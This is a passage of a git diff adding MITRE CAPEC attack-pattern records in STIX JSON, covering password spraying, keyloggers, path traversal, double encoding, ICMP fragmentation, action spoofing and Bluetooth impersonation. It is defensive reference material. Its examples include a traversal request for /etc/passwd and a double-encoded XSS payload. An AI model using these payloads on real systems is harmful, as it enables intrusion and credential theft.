+ "description": "\n In a Password Spraying attack, an adversary tries a small list (e.g. 3-5) of common or expected passwords, often matching the target's complexity policy, against a known list of user accounts to gain valid credentials. The adversary tries a particular password for each user account, before moving onto the next password in the list. This approach assists the adversary in remaining undetected by avoiding rapid or frequent account lockouts. The adversary may then reattempt the process with additional passwords, once enough time has passed to prevent inducing a lockout.\n ",
+ "external_references": [
+ {
+ "external_id": "CAPEC-565",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/565.html"
+ },
+ {
+ "external_id": "CWE-521",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/521.html"
+ },
+ {
+ "external_id": "CWE-262",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/262.html"
+ },
+ {
+ "external_id": "CWE-263",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/263.html"
+ },
+ {
+ "external_id": "CWE-654",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/654.html"
+ },
+ {
+ "external_id": "CWE-307",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/307.html"
+ },
+ {
+ "external_id": "CWE-308",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/308.html"
+ },
+ {
+ "external_id": "CWE-309",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/309.html"
+ },
+ {
+ "description": "Brute Force:Password Spraying",
+ "external_id": "T1110.003",
+ "source_name": "ATTACK",
+ "url": "https://attack.mitre.org/wiki/Technique/T1110/003"
+ },
+ {
+ "description": "ACSC Releases Advisory on Password Spraying Attacks, 2019--08---08, Cybersecurity and Infrastructure Security Agency (CISA)",
+ "external_id": "REF-565",
+ "source_name": "reference_from_CAPEC",
+ "url": "https://www.us-cert.gov/ncas/current-activity/2019/08/08/acsc-releases-advisory-password-spraying-attacks"
+ },
+ {
+ "description": "Andy Greenberg, A notorious Iranian hacking crew is targeting industrial control systems, 2019--11---23, Ars Technica",
+ "external_id": "REF-566",
+ "source_name": "reference_from_CAPEC",
+ "url": "https://arstechnica.com/information-technology/2019/11/a-notorious-iranian-hacking-crew-is-targeting-industrial-control-systems/"
+ },
+ {
+ "description": "Alert (TA18-086A): Brute Force Attacks Conducted by Cyber Actors, 2018--03---27, Cybersecurity and Infrastructure Security Agency (CISA)",
+ "external_id": "REF-567",
+ "source_name": "reference_from_CAPEC",
+ "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A"
+ }
+ ],
+ "id": "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d",
+ "modified": "2022-02-22T00:00:00.000Z",
+ "name": "Password Spraying",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Detailed",
+ "x_capec_can_precede_refs": [
+ "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a",
+ "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b",
+ "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7",
+ "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2",
+ "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a"
+ ],
+ "x_capec_child_of_refs": [
+ "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427"
+ ],
+ "x_capec_consequences": {
+ "Access_Control": [
+ "Gain Privileges"
+ ],
+ "Authentication": [
+ "Gain Privileges"
+ ],
+ "Authorization": [
+ "Read Data"
+ ],
+ "Confidentiality": [
+ "Gain Privileges",
+ "Read Data"
+ ],
+ "Integrity": [
+ "Modify Data"
+ ]
+ },
+ "x_capec_domains": [
+
"Software" + ], + "x_capec_example_instances": [ + "A user selects the phrase \"Password123\" as their password, believing that it would be very difficult to guess. Password Spraying, leveraging a list of commonly used passwords, is used to crack this password and gain access to the account.", + "The Iranian hacker group APT33 (AKA Holmium, Refined Kitten, or Elfin) carried out numerous Password Spraying attacks in 2019. On average, APT33 targeted 2,000 organizations per month, with upwards of 10 million authentication attempts each day. The majority of these attacks targeted manufacturers, suppliers, or maintainers of industrial control system equipment." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target's password policy: Determine the password policies of the target system/application.

  2. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).
  3. Select passwords: Pick the passwords to be used in the attack (e.g. commonly used passwords, passwords tailored to individual users, etc.)

  4. Techniques
    Select passwords based on common use or a particular user's additional details.
    Select passwords based on the target's password complexity policies.

Exploit

  1. Brute force password: Given the finite space of possible passwords dictated by information determined in the previous steps, try each password for all known user accounts until the target grants access.

  2. Techniques
    Manually or automatically enter the first password for each known user account through the target's interface. In most systems, start with the shortest and simplest possible passwords, because most users tend to select such passwords if allowed to do so.
    Iterate through the remaining passwords for each known user account.
", + "x_capec_extended_description": "\n Password Spraying attacks often target management services over commonly used ports such as SSH, FTP, Telnet, LDAP, Kerberos, MySQL, and more. Additional targets include Single Sign-On (SSO) or cloud-based applications/services that utilize federated authentication protocols, and externally facing applications. Successful execution of Password Spraying attacks usually lead to lateral movement within the target, which allows the adversary to impersonate the victim or execute any action that the victim is authorized to perform. If the password chosen by the user is commonly used or easily guessed, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.\n Password Spraying Attacks are similar to Dictionary-based Password Attacks (CAPEC-16) in that they both leverage precompiled lists (i.e. dictionaries) of username/password combinations to try against a system/application. The primary difference is that Password Spraying Attacks leverage a known list of user accounts and only try one password for each account before moving onto the next password. In contrast, Dictionary-based Password Attacks leverage unknown username/password combinations and are often executed offline against files containing hashed credentials, where inducing an account lockout is not a concern.\n Password Spraying Attacks are also similar to Credential Stuffing attacks (CAPEC-600), since both utilize known user accounts and often attack the same targets. Credential Stuffing attacks, however, leverage known username/password combinations, whereas Password Spraying attacks have no insight into known username/password pairs. 
If a Password Spraying attack succeeds, it may additionally lead to Credential Stuffing attacks on different targets.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The system/application uses one factor password based authentication.", + "The system/application does not have a sound password policy that is being enforced.", + "The system/application does not implement an effective password throttling mechanism.", + "The adversary possesses a list of known user accounts on the target system/application." + ], + "x_capec_resources_required": [ + "A machine with sufficient resources for the job (e.g. CPU, RAM, HD).", + "Applicable password lists.", + "A password cracking tool or a custom script that leverages the password list to launch the attack." + ], + "x_capec_skills_required": { + "Low": "A Password Spraying attack is very straightforward. A variety of password cracking tools are widely available." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f.json new file mode 100644 index 0000000000000000000000000000000000000000..0dfee34ab6e61b28713141e956a8b61d913e0acf --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f.json 
@@ -0,0 +1,56 @@ +{ + "id": "bundle--b01dfd73-d42e-4411-aebd-35dd718b3ebd", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary deploys a keylogger in an effort to obtain credentials directly from a system's user. After capturing all the keystrokes made by a user, the adversary can analyze the data and determine which string are likely to be passwords or other credential related information.", + "external_references": [ + { + "external_id": "CAPEC-568", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/568.html" + }, + { + "description": "Input Capture:Keylogging", + "external_id": "T1056.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1056/001" + } + ], + "id": "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Capture Credentials via Keylogger", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--c8c9dfbe-7a40-4041-84ff-89942878a2f4" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--52103765-d380-42fc-aa4d-a8b24615548a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine which user's credentials to capture: Since this is a more targeted attack, an adversary will first identify a particular user they wish the capture the credentials of.

Experiment

  1. Deploy keylogger: Once a user is identified, an adversary will deploy a keylogger to the user's system in one of many ways.

  2. Techniques
    Send a phishing email with a malicious attachment that installs a keylogger on a user's system
    Conceal a keylogger behind fake software and get the user to download the software
    Get a user to click on a malicious URL that directs them to a webpage that will install a keylogger without their knowledge
    Gain access to the user's system through a vulnerability and manually install a keylogger
  3. Record keystrokes: Once the keylogger is deployed on the user's system, the adversary will record keystrokes over a period of time.

  4. Analyze data and determine credentials: Using the captured keystrokes, the adversary will be able to determine the credentials of the user.

  5. Techniques
    Search for repeated sequences that are following by the enter key
    Search for repeated sequences that are not found in a dictionary
    Search for several backspaces in a row. This could indicate a mistyped password. The correct password can then be inferred using the whole key sequence

Exploit

  1. Use found credentials: After the adversary has found the credentials for the target user, they will then use them to gain access to a system in order to perform some follow-up attack

", + "x_capec_prerequisites": [ + "The ability to install the keylogger, either in person or remote." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170.json new file mode 100644 index 0000000000000000000000000000000000000000..546363d2062ef699547225622df9e2ab703d8293 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170.json 
@@ -0,0 +1,110 @@ +{ + "id": "bundle--4f0c645d-7ea9-4182-ae69-ed1f3fe95b5c", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses path manipulation methods to exploit insufficient input validation of a target to obtain access to data that should be not be retrievable by ordinary well-formed requests. A typical variety of this attack involves specifying a path to a desired file together with dot-dot-slash characters, resulting in the file access API or function traversing out of the intended directory structure and into the root file system. By replacing or modifying the expected path information the access function or API retrieves the file desired by the attacker. These attacks either involve the attacker providing a complete path to a targeted file or using control characters (e.g. path separators (/ or \\) and/or dots (.)) to reach desired directories or files.", + "external_references": [ + { + "external_id": "CAPEC-126", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/126.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "description": "Path Traversal", + "external_id": "33", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Path-Traversal" + }, + { + "description": "Path Traversal", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Path_Traversal" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "OWASP Testing Guide (v4), 2010, The Open Web Application Security Project (OWASP)", + "external_id": "REF-9", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-10", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246952/Path-Traversal" + } + ], + "id": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Path Traversal", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "Directory Traversal" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642" + ], + "x_capec_child_of_refs": [ + "attack-pattern--71d31712-9174-4433-8e4f-8520a3ec1249" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Unreliable Execution (The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. 
This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Read Data (The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Modify Data (The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An example of using path traversal to attack some set of resources on a web server is to use a standard HTTP request\n http://example/../../../../../etc/passwd\n From an attacker point of view, this may be sufficient to gain access to the password file on a poorly protected system. If the attacker can list directories of critical resources then read only access is not sufficient to protect the system.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Fingerprinting of the operating system: In order to perform a valid path traversal, the attacker needs to know what the underlying OS is so that the proper file seperator is used.

  2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages
  3. Survey the Application to Identify User-controllable Inputs: The attacker surveys the target application to identify all user-controllable file inputs

Experiment

  1. Vary inputs, looking for malicious results: Depending on whether the application being exploited is a remote or local one, the attacker crafts the appropriate malicious input containing the path of the targeted file or other file system control syntax to be passed to the application

Exploit

  1. Manipulate files accessible by the application: The attacker may steal information or directly manipulate files (delete, copy, flush, etc.)

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62" + ], + "x_capec_prerequisites": [ + "The attacker must be able to control the path that is requested of the target.", + "The target must fail to adequately sanitize incoming paths" + ], + "x_capec_resources_required": [ + "The ability to manually manipulate path information either directly through a client application relative to the service or application or via a proxy application." + ], + "x_capec_skills_required": { + "Low": "Simple command line attacks or to inject the malicious payload in a web page.", + "Medium": "Customizing attacks to bypass non trivial filters in the application." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9.json new file mode 100644 index 0000000000000000000000000000000000000000..f47a68a3b26acb3c03420ddb1728d78b71ade032 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9.json 
@@ -0,0 +1,99 @@ +{ + "id": "bundle--17aa9d8e-11c5-4094-b6ac-174c590ef85e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) 
by interpreters on the target.", + "external_references": [ + { + "external_id": "CAPEC-120", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-183", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/183.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-692", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html" + } + ], + "id": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Double Encoding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Double Enconding Attacks can often be used to bypass Cross Site Scripting (XSS) detection and execute XSS attacks.:\n 
%253Cscript%253Ealert('This is an XSS Attack')%253C%252Fscript%253E\n Since <, <, and / are often sued to perform web attacks, these may be captured by XSS filters. The use of double encouding prevents the filter from working as intended and allows the XSS to bypass dectection. This can allow an adversary to execute malicious code.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an attacker records all entry points to the application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: Try double-encoding for parts of the input in order to try to get past the filters. For instance, by double encoding certain characters in the URL (e.g. dots and slashes) an adversary may try to get access to restricted resources on the web server or force browse to protected pages (thus subverting the authorization service). An adversary can also attempt other injection style attacks using this attack pattern: command injection, SQL injection, etc.

  2. Techniques
    Try to use double-encoding to bypass validation routines.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target's filters must fail to detect that a character has been doubly encoded but its interpreting engine must still be able to convert a doubly encoded character to an un-encoded character.", + "The application accepts and decodes URL string request.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_resources_required": [ + "Tools that automate encoding of data can assist the adversary in generating encoded strings." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fb5cd90b-cd8e-4df7-958b-6d0e4304507f.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fb5cd90b-cd8e-4df7-958b-6d0e4304507f.json new file mode 100644 index 0000000000000000000000000000000000000000..077eeb761437d72b24d15955cafe791e28126b4a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fb5cd90b-cd8e-4df7-958b-6d0e4304507f.json 
@@ -0,0 +1,29 @@ +{ + "id": "bundle--03088e52-02e8-437f-9738-d1ee35c68bd4", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This pattern has been deprecated as it was determined to be an unnecessary layer of abstraction. Please refer to the standard level pattern CAPEC-312 : Active OS Fingerprinting going forward, or to any of the detailed patterns that are children of CAPEC-312.", + "external_references": [ + { + "external_id": "CAPEC-315", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/315.html" + } + ], + "id": "attack-pattern--fb5cd90b-cd8e-4df7-958b-6d0e4304507f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: TCP/IP Fingerprinting Probes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de.json new file mode 100644 index 0000000000000000000000000000000000000000..ad672c95071f79437d0a968bf8107e65a8e3735d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de.json 
@@ -0,0 +1,55 @@ +{ + "id": "bundle--76208529-fdee-42a3-8f84-7535f165b87b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may execute a ICMP Fragmentation attack against a target with the intention of consuming resources or causing a crash. The attacker crafts a large number of identical fragmented IP packets containing a portion of a fragmented ICMP message. The attacker these sends these messages to a target host which causes the host to become non-responsive. Another vector may be sending a fragmented ICMP message to a target host with incorrect sizes in the header which causes the host to hang.", + "external_references": [ + { + "external_id": "CAPEC-496", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/496.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "ICMP Attacks Illustrated", + "external_id": "REF-425", + "source_name": "reference_from_CAPEC", + "url": "http://www.sans.org/reading-room/whitepapers/threats/icmp-attacks-illustrated-477?show=icmp-attacks-illustrated-477&cat=threats" + } + ], + "id": "attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de", + "modified": "2019-04-04T00:00:00.000Z", + "name": "ICMP Fragmentation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the target system to be running a vulnerable implementation of IP, and the attacker 
needs to ability to send arbitrary sized ICMP packets to the target." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8.json new file mode 100644 index 0000000000000000000000000000000000000000..6e8d495034bf57c6023e3e89f890bb75a374897e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8.json 
@@ -0,0 +1,61 @@ +{ + "id": "bundle--b0fafa71-7ab1-4be1-a9d6-34389c838c38", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary is able to disguise one action for another and therefore trick a user into initiating one type of action when they intend to initiate a different action. For example, a user might be led to believe that clicking a button will submit a query, but in fact it downloads software. Adversaries may perform this attack through social means, such as by simply convincing a victim to perform the action or relying on a user's natural inclination to do so, or through technical means, such as a clickjacking attack where a user sees one interface but is actually interacting with a second, invisible, interface.", + "external_references": [ + { + "external_id": "CAPEC-173", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-451", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/451.html" + } + ], + "id": "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Action Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Other (Action spoofing can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ], + "Confidentiality": [ + "Other (Action spoofing can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ], + "Integrity": [ + "Other (Action spoofing can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + 
"Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef", + "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4", + "attack-pattern--1995c522-a25d-46e4-b024-65172771a692", + "attack-pattern--79309efd-dd13-41d2-81c6-ec382bced2b4" + ], + "x_capec_prerequisites": [ + "The adversary must convince the victim into performing the decoy action.", + "The adversary must have the means to control a user's interface to present them with a decoy action as well as the actual malicious action. Simple versions of this attack can be performed using web pages requiring only that the adversary be able to host (or control) content that the user visits." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5.json new file mode 100644 index 0000000000000000000000000000000000000000..73953a2c12e3b8942eab7c622caa5d945ee7ec19 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5.json 
@@ -0,0 +1,56 @@ +{ + "id": "bundle--f2df8470-e6e5-403e-a8d6-aadfac0fd205", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary disguises the MAC address of their Bluetooth enabled device to one for which there exists an active and trusted connection and authenticates successfully. The adversary can then perform malicious actions on the target Bluetooth device depending on the target’s capabilities.", + "external_references": [ + { + "external_id": "CAPEC-667", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/667.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + } + ], + "id": "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Bluetooth Impersonation AttackS (BIAS)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Confidentiality": [], + "Integrity": [] + }, + "x_capec_domains": [ 